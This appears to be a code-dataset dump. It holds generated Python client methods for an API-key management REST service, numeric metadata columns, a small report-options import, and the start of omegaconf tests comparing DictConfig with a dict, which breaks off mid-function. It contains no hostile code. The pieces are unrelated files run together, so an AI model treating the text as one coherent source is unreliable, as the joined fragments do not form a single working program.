def describe_api_key_with_http_info(self, api_key_id, api_version, **kwargs): # noqa: E501
"""Describe an API Key # noqa: E501
Describe an API key by ID. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.describe_api_key_with_http_info(api_key_id, api_version, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int api_key_id: The ID number of the API key to describe. (required)
:param str api_version: The version of the api being called. (required)
:return: ApiKey
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['api_key_id', 'api_version'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method describe_api_key" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'api_key_id' is set
if ('api_key_id' not in params or
params['api_key_id'] is None):
raise ValueError("Missing the required parameter `api_key_id` when calling `describe_api_key`") # noqa: E501
# verify the required parameter 'api_version' is set
if ('api_version' not in params or
params['api_version'] is None):
raise ValueError("Missing the required parameter `api_version` when calling `describe_api_key`") # noqa: E501
if 'api_key_id' in params and not re.search('\\d+', str(params['api_key_id'])): # noqa: E501
raise ValueError("Invalid value for parameter `api_key_id` when calling `describe_api_key`, must conform to the pattern `/\\d+/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'api_key_id' in params:
path_params['apiKeyID'] = params['api_key_id'] # noqa: E501
query_params = []
header_params = {}
if 'api_version' in params:
header_params['api-version'] = params['api_version'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['DefaultAuthentication'] # noqa: E501
return self.api_client.call_api(
'/apikeys/{apiKeyID}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ApiKey', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def describe_current_api_key(self, api_version, **kwargs): # noqa: E501
"""Describe the Current API Key # noqa: E501
Describe the API key that is associated with the credentials that are being used to authenticate this call. Authentication must be done via an API secret key. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.describe_current_api_key(api_version, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str api_version: The version of the api being called. (required)
:return: ApiKeyCurrent
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.describe_current_api_key_with_http_info(api_version, **kwargs) # noqa: E501
else:
(data) = self.describe_current_api_key_with_http_info(api_version, **kwargs) # noqa: E501
return data
def describe_current_api_key_with_http_info(self, api_version, **kwargs): # noqa: E501
"""Describe the Current API Key # noqa: E501
Describe the API key that is associated with the credentials that are being used to authenticate this call. Authentication must be done via an API secret key. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.describe_current_api_key_with_http_info(api_version, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str api_version: The version of the api being called. (required)
:return: ApiKeyCurrent
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['api_version'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method describe_current_api_key" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'api_version' is set
if ('api_version' not in params or
params['api_version'] is None):
raise ValueError("Missing the required parameter `api_version` when calling `describe_current_api_key`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
if 'api_version' in params:
header_params['api-version'] = params['api_version'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['DefaultAuthentication'] # noqa: E501
return self.api_client.call_api(
'/apikeys/current', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ApiKeyCurrent', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def list_api_keys(self, api_version, **kwargs): # noqa: E501
"""List API Keys # noqa: E501
Lists all API keys. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_api_keys(api_version, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str api_version: The version of the api being called. (required)
:return: ApiKeys
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.list_api_keys_with_http_info(api_version, **kwargs) # noqa: E501
else:
(data) = self.list_api_keys_with_http_info(api_version, **kwargs) # noqa: E501
return data
def list_api_keys_with_http_info(self, api_version, **kwargs): # noqa: E501
"""List API Keys # noqa: E501
Lists all API keys. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_api_keys_with_http_info(api_version, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str api_version: The version of the api being called. (required)
:return: ApiKeys
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['api_version'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_api_keys" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'api_version' is set
if ('api_version' not in params or
params['api_version'] is None):
raise ValueError("Missing the required parameter `api_version` when calling `list_api_keys`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
if 'api_version' in params:
header_params['api-version'] = params['api_version'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['DefaultAuthentication'] # noqa: E501
return self.api_client.call_api(
'/apikeys', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ApiKeys', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def modify_api_key(self, api_key_id, api_key, api_version, **kwargs): # noqa: E501
"""Modify an API Key # noqa: E501
Modify an API key by ID. Any unset elements will be left unchanged. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.modify_api_key(api_key_id, api_key, api_version, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int api_key_id: The ID number of the API key to modify. (required)
:param ApiKey api_key: The settings of the API key to modify. (required)
:param str api_version: The version of the api being called. (required)
:return: ApiKey
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.modify_api_key_with_http_info(api_key_id, api_key, api_version, **kwargs) # noqa: E501
else:
(data) = self.modify_api_key_with_http_info(api_key_id, api_key, api_version, **kwargs) # noqa: E501
return data
def modify_api_key_with_http_info(self, api_key_id, api_key, api_version, **kwargs): # noqa: E501
"""Modify an API Key # noqa: E501
Modify an API key by ID. Any unset elements will be left unchanged. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.modify_api_key_with_http_info(api_key_id, api_key, api_version, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int api_key_id: The ID number of the API key to modify. (required)
:param ApiKey api_key: The settings of the API key to modify. (required)
:param str api_version: The version of the api being called. (required)
:return: ApiKey
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['api_key_id', 'api_key', 'api_version'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method modify_api_key" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'api_key_id' is set
if ('api_key_id' not in params or
params['api_key_id'] is None):
raise ValueError("Missing the required parameter `api_key_id` when calling `modify_api_key`") # noqa: E501
# verify the required parameter 'api_key' is set
if ('api_key' not in params or
params['api_key'] is None):
raise ValueError("Missing the required parameter `api_key` when calling `modify_api_key`") # noqa: E501
# verify the required parameter 'api_version' is set
if ('api_version' not in params or
params['api_version'] is None):
raise ValueError("Missing the required parameter `api_version` when calling `modify_api_key`") # noqa: E501
if 'api_key_id' in params and not re.search('\\d+', str(params['api_key_id'])): # noqa: E501
raise ValueError("Invalid value for parameter `api_key_id` when calling `modify_api_key`, must conform to the pattern `/\\d+/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'api_key_id' in params:
path_params['apiKeyID'] = params['api_key_id'] # noqa: E501
query_params = []
header_params = {}
if 'api_version' in params:
header_params['api-version'] = params['api_version'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
if 'api_key' in params:
body_params = params['api_key']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['DefaultAuthentication'] # noqa: E501
return self.api_client.call_api(
'/apikeys/{apiKeyID}', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ApiKey', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def modify_current_api_key(self, api_key, api_version, **kwargs): # noqa: E501
"""Modify the Current API Key # noqa: E501
Modify the API key that is associated with the credentials that are being used to authenticate this call. Authentication must be done via an API secret key. Writable fields are: keyName, description, locale, & timeZone. Any unset elements will be left unchanged. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.modify_current_api_key(api_key, api_version, async_req=True)
>>> result = thread.get()
:param async_req bool
:param ApiKeyCurrent api_key: The settings of the API key to modify. (required)
:param str api_version: The version of the api being called. (required)
:return: ApiKeyCurrent
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.modify_current_api_key_with_http_info(api_key, api_version, **kwargs) # noqa: E501
else:
(data) = self.modify_current_api_key_with_http_info(api_key, api_version, **kwargs) # noqa: E501
return data
def modify_current_api_key_with_http_info(self, api_key, api_version, **kwargs): # noqa: E501
"""Modify the Current API Key # noqa: E501
Modify the API key that is associated with the credentials that are being used to authenticate this call. Authentication must be done via an API secret key. Writable fields are: keyName, description, locale, & timeZone. Any unset elements will be left unchanged. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.modify_current_api_key_with_http_info(api_key, api_version, async_req=True)
>>> result = thread.get()
:param async_req bool
:param ApiKeyCurrent api_key: The settings of the API key to modify. (required)
:param str api_version: The version of the api being called. (required)
:return: ApiKeyCurrent
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['api_key', 'api_version'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method modify_current_api_key" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'api_key' is set
if ('api_key' not in params or
params['api_key'] is None):
raise ValueError("Missing the required parameter `api_key` when calling `modify_current_api_key`") # noqa: E501
# verify the required parameter 'api_version' is set
if ('api_version' not in params or
params['api_version'] is None):
raise ValueError("Missing the required parameter `api_version` when calling `modify_current_api_key`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
if 'api_version' in params:
header_params['api-version'] = params['api_version'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
if 'api_key' in params:
body_params = params['api_key']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['DefaultAuthentication'] # noqa: E501
return self.api_client.call_api(
'/apikeys/current', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ApiKeyCurrent', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def replace_api_secret_key(self, api_key_id, api_version, **kwargs): # noqa: E501
"""Generate an API Secret Key # noqa: E501
Generate a new API secret key. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.replace_api_secret_key(api_key_id, api_version, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int api_key_id: The ID number of API key used to generate the secret key. (required)
:param str api_version: The version of the api being called. (required)
:return: ApiKey
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.replace_api_secret_key_with_http_info(api_key_id, api_version, **kwargs) # noqa: E501
else:
(data) = self.replace_api_secret_key_with_http_info(api_key_id, api_version, **kwargs) # noqa: E501
return data
def replace_api_secret_key_with_http_info(self, api_key_id, api_version, **kwargs): # noqa: E501
"""Generate an API Secret Key # noqa: E501
Generate a new API secret key. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.replace_api_secret_key_with_http_info(api_key_id, api_version, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int api_key_id: The ID number of API key used to generate the secret key. (required)
:param str api_version: The version of the api being called. (required)
:return: ApiKey
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['api_key_id', 'api_version'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method replace_api_secret_key" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'api_key_id' is set
if ('api_key_id' not in params or
params['api_key_id'] is None):
raise ValueError("Missing the required parameter `api_key_id` when calling `replace_api_secret_key`") # noqa: E501
# verify the required parameter 'api_version' is set
if ('api_version' not in params or
params['api_version'] is None):
raise ValueError("Missing the required parameter `api_version` when calling `replace_api_secret_key`") # noqa: E501
if 'api_key_id' in params and not re.search('\\d+', str(params['api_key_id'])): # noqa: E501
raise ValueError("Invalid value for parameter `api_key_id` when calling `replace_api_secret_key`, must conform to the pattern `/\\d+/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'api_key_id' in params:
path_params['apiKeyID'] = params['api_key_id'] # noqa: E501
query_params = []
header_params = {}
if 'api_version' in params:
header_params['api-version'] = params['api_version'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['DefaultAuthentication'] # noqa: E501
return self.api_client.call_api(
'/apikeys/{apiKeyID}/secretkey', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ApiKey', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def replace_current_api_secret_key(self, api_version, **kwargs): # noqa: E501
"""Generate a Secret Key for the Current API Key # noqa: E501
Generate a new secret key for the current API key. Authentication must be done via an API secret key. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.replace_current_api_secret_key(api_version, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str api_version: The version of the api being called. (required)
:return: ApiKey
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.replace_current_api_secret_key_with_http_info(api_version, **kwargs) # noqa: E501
else:
(data) = self.replace_current_api_secret_key_with_http_info(api_version, **kwargs) # noqa: E501
return data
def replace_current_api_secret_key_with_http_info(self, api_version, **kwargs): # noqa: E501
"""Generate a Secret Key for the Current API Key # noqa: E501
Generate a new secret key for the current API key. Authentication must be done via an API secret key. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.replace_current_api_secret_key_with_http_info(api_version, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str api_version: The version of the api being called. (required)
:return: ApiKey
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['api_version'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method replace_current_api_secret_key" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'api_version' is set
if ('api_version' not in params or
params['api_version'] is None):
raise ValueError("Missing the required parameter `api_version` when calling `replace_current_api_secret_key`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
if 'api_version' in params:
header_params['api-version'] = params['api_version'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['DefaultAuthentication'] # noqa: E501
return self.api_client.call_api(
'/apikeys/current/secretkey', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ApiKey', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def search_api_keys(self, api_version, **kwargs): # noqa: E501
"""Search API Keys # noqa: E501
Search for API keys using optional filters. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.search_api_keys(api_version, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str api_version: The version of the api being called. (required)
:param SearchFilter search_filter: A collection of options used to filter the search results.
:return: ApiKeys
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.search_api_keys_with_http_info(api_version, **kwargs) # noqa: E501
else:
(data) = self.search_api_keys_with_http_info(api_version, **kwargs) # noqa: E501
return data
def search_api_keys_with_http_info(self, api_version, **kwargs): # noqa: E501
"""Search API Keys # noqa: E501
Search for API keys using optional filters. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.search_api_keys_with_http_info(api_version, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str api_version: The version of the api being called. (required)
:param SearchFilter search_filter: A collection of options used to filter the search results.
:return: ApiKeys
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['api_version', 'search_filter'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method search_api_keys" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'api_version' is set
if ('api_version' not in params or
params['api_version'] is None):
raise ValueError("Missing the required parameter `api_version` when calling `search_api_keys`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
if 'api_version' in params:
header_params['api-version'] = params['api_version'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
if 'search_filter' in params:
body_params = params['search_filter']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['DefaultAuthentication'] # noqa: E501
return self.api_client.call_api(
'/apikeys/search', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ApiKeys', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 44.007319
| 311
| 0.608316
| 5,794
| 48,100
| 4.792544
| 0.038833
| 0.046672
| 0.020743
| 0.02881
| 0.973243
| 0.970254
| 0.968885
| 0.965068
| 0.962475
| 0.96017
| 0
| 0.016764
| 0.305509
| 48,100
| 1,092
| 312
| 44.047619
| 0.814489
| 0.335094
| 0
| 0.823232
| 0
| 0
| 0.218026
| 0.041958
| 0
| 0
| 0
| 0
| 0
| 1
| 0.035354
| false
| 0
| 0.006734
| 0
| 0.094276
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8033e3598436baec3a6efc3039c1d8f8d116a59a
| 162
|
py
|
Python
|
piecash_utilities/report/__init__.py
|
sdementen/gnucash-utilities
|
973edf1d32d674f6bedbb38f63f687f7a0aa642b
|
[
"MIT"
] | 13
|
2016-12-22T23:14:29.000Z
|
2021-01-12T07:22:12.000Z
|
piecash_utilities/report/__init__.py
|
sdementen/gnucash-utilities
|
973edf1d32d674f6bedbb38f63f687f7a0aa642b
|
[
"MIT"
] | 5
|
2017-11-12T19:53:49.000Z
|
2017-11-23T13:26:04.000Z
|
piecash_utilities/report/__init__.py
|
sdementen/gnucash-utilities
|
973edf1d32d674f6bedbb38f63f687f7a0aa642b
|
[
"MIT"
] | 4
|
2017-09-06T20:00:23.000Z
|
2019-03-26T14:14:40.000Z
|
from .options import DateOption, StringOption, RangeOption
from .report import report, generate_sample_report_python, generate_sample_report_html, execute_report
| 54
| 102
| 0.876543
| 20
| 162
| 6.75
| 0.6
| 0.207407
| 0.296296
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.080247
| 162
| 2
| 103
| 81
| 0.90604
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
33905cbd909f88fcf7117f15ddb32118a33659e0
| 22,354
|
py
|
Python
|
tests/test_compare_dictconfig_vs_dict.py
|
sugatoray/omegaconf
|
edf9e86493a14b0e909e956d9bae59b9861ef9c5
|
[
"BSD-3-Clause"
] | 1,091
|
2018-09-06T17:27:12.000Z
|
2022-03-31T13:47:45.000Z
|
tests/test_compare_dictconfig_vs_dict.py
|
sugatoray/omegaconf
|
edf9e86493a14b0e909e956d9bae59b9861ef9c5
|
[
"BSD-3-Clause"
] | 624
|
2019-06-11T20:53:19.000Z
|
2022-03-30T20:44:25.000Z
|
tests/test_compare_dictconfig_vs_dict.py
|
sugatoray/omegaconf
|
edf9e86493a14b0e909e956d9bae59b9861ef9c5
|
[
"BSD-3-Clause"
] | 71
|
2019-06-14T05:32:45.000Z
|
2022-03-27T19:52:35.000Z
|
"""
This file compares DictConfig methods with the corresponding
methods of standard python's dict.
The following methods are compared:
__contains__
__delitem__
__eq__
__getitem__
__setitem__
get
pop
keys
values
items
We have separate test classes for the following cases:
TestUntypedDictConfig: for DictConfig without a set key_type
TestPrimitiveTypeDunderMethods: for DictConfig where key_type is primitive
TestEnumTypeDunderMethods: for DictConfig where key_type is Enum
"""
from copy import deepcopy
from enum import Enum
from typing import Any, Dict, Optional
from pytest import fixture, mark, param, raises
from omegaconf import DictConfig, OmegaConf
from omegaconf.errors import ConfigKeyError, ConfigTypeError, KeyValidationError
from tests import Enum1
@fixture(
params=[
"str",
1,
3.1415,
True,
Enum1.FOO,
]
)
def key(request: Any) -> Any:
"""A key to test indexing into DictConfig."""
return request.param
@fixture
def python_dict(data: Dict[Any, Any]) -> Dict[Any, Any]:
"""Just a standard python dictionary, to be used in comparison with DictConfig."""
return deepcopy(data)
@fixture(params=[None, False, True])
def struct_mode(request: Any) -> Optional[bool]:
struct_mode: Optional[bool] = request.param
return struct_mode
@mark.parametrize(
"data",
[
param({"a": 10}, id="str"),
param({1: "a"}, id="int"),
param({123.45: "a"}, id="float"),
param({True: "a"}, id="bool"),
param({Enum1.FOO: "foo"}, id="Enum1"),
],
)
class TestUntypedDictConfig:
"""Compare DictConfig with python dict in the case where key_type is not set."""
@fixture
def cfg(self, python_dict: Any, struct_mode: Optional[bool]) -> DictConfig:
"""Create a DictConfig instance from the given data"""
cfg: DictConfig = DictConfig(content=python_dict)
OmegaConf.set_struct(cfg, struct_mode)
return cfg
def test__setitem__(
self, python_dict: Any, cfg: DictConfig, key: Any, struct_mode: Optional[bool]
) -> None:
"""Ensure that __setitem__ has same effect on python dict and on DictConfig."""
if struct_mode and key not in cfg:
with raises(ConfigKeyError):
cfg[key] = "sentinel"
else:
python_dict[key] = "sentinel"
cfg[key] = "sentinel"
assert python_dict == cfg
def test__getitem__(self, python_dict: Any, cfg: DictConfig, key: Any) -> None:
"""Ensure that __getitem__ has same result with python dict as with DictConfig."""
try:
result = python_dict[key]
except KeyError:
with raises(ConfigKeyError):
cfg[key]
else:
assert result == cfg[key]
@mark.parametrize("struct_mode", [False, None])
def test__delitem__(self, python_dict: Any, cfg: DictConfig, key: Any) -> None:
"""Ensure that __delitem__ has same result with python dict as with DictConfig."""
try:
del python_dict[key]
assert key not in python_dict
except KeyError:
with raises(ConfigKeyError):
del cfg[key]
else:
del cfg[key]
assert key not in cfg
@mark.parametrize("struct_mode", [True])
def test__delitem__struct_mode(
self, python_dict: Any, cfg: DictConfig, key: Any
) -> None:
"""Ensure that __delitem__ fails in struct_mode"""
with raises(ConfigTypeError):
del cfg[key]
def test__contains__(self, python_dict: Any, cfg: Any, key: Any) -> None:
"""Ensure that __contains__ has same result with python dict as with DictConfig."""
assert (key in python_dict) == (key in cfg)
def test__eq__(self, python_dict: Any, cfg: Any, key: Any) -> None:
assert python_dict == cfg
def test_get(self, python_dict: Any, cfg: DictConfig, key: Any) -> None:
"""Ensure that __getitem__ has same result with python dict as with DictConfig."""
assert python_dict.get(key) == cfg.get(key)
def test_get_with_default(
self, python_dict: Any, cfg: DictConfig, key: Any
) -> None:
"""Ensure that __getitem__ has same result with python dict as with DictConfig."""
assert python_dict.get(key, "DEFAULT") == cfg.get(key, "DEFAULT")
@mark.parametrize("struct_mode", [False, None])
def test_pop(
self,
python_dict: Any,
cfg: DictConfig,
key: Any,
) -> None:
"""Ensure that pop has same result with python dict as with DictConfig."""
try:
result = python_dict.pop(key)
except KeyError:
with raises(ConfigKeyError):
cfg.pop(key)
else:
assert result == cfg.pop(key)
assert python_dict.keys() == cfg.keys()
@mark.parametrize("struct_mode", [True])
def test_pop_struct_mode(
self,
python_dict: Any,
cfg: DictConfig,
key: Any,
) -> None:
"""Ensure that pop fails in struct mode."""
with raises(ConfigTypeError):
cfg.pop(key)
@mark.parametrize("struct_mode", [False, None])
def test_pop_with_default(
self,
python_dict: Any,
cfg: DictConfig,
key: Any,
) -> None:
"""Ensure that pop(..., DEFAULT) has same result with python dict as with DictConfig."""
assert python_dict.pop(key, "DEFAULT") == cfg.pop(key, "DEFAULT")
assert python_dict.keys() == cfg.keys()
@mark.parametrize("struct_mode", [True])
def test_pop_with_default_struct_mode(
self,
python_dict: Any,
cfg: DictConfig,
key: Any,
) -> None:
"""Ensure that pop(..., DEFAULT) fails in struct mode."""
with raises(ConfigTypeError):
cfg.pop(key, "DEFAULT")
def test_keys(self, python_dict: Any, cfg: Any) -> None:
